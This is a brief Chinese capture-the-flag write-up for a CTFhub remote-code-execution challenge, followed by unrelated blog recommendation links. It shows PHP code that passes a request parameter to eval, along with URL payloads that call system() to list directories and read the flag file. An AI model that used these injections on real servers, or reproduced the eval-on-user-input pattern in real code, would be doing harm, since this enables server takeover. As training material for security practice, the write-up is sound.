CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
一灯架构1 天前
90%的人答错!一文带你彻底搞懂ArrayList
java·后端
小李子呢02111 天前
前端八股CSS(2)---动画的实现方式
前端·javascript
Y4090011 天前
【多线程】线程安全(1)
java·开发语言·jvm
布局呆星1 天前
SpringBoot 基础入门
java·spring boot·spring
风吹迎面入袖凉1 天前
【Redis】Redisson的可重入锁原理
java·redis
w6100104661 天前
cka-2026-ConfigMap
java·linux·cka·configmap
GreenTea1 天前
从 Claw-Code 看 AI 驱动的大型项目开发:2 人 + 10 个自治 Agent 如何产出 48K 行 Rust 代码
前端·人工智能·后端
语戚1 天前
力扣 968. 监控二叉树 —— 贪心 & 树形 DP 双解法递归 + 非递归全解(Java 实现)
java·算法·leetcode·贪心算法·动态规划·力扣·
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点03一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛04基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南05GPT-6核心能力解析及与现有主流大模型对比06免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手07零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)08从限购到畅通:GLM-5.1 Coding Plan接入攻略09CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南10LLM Wiki:让大模型替你打理知识库的完整指南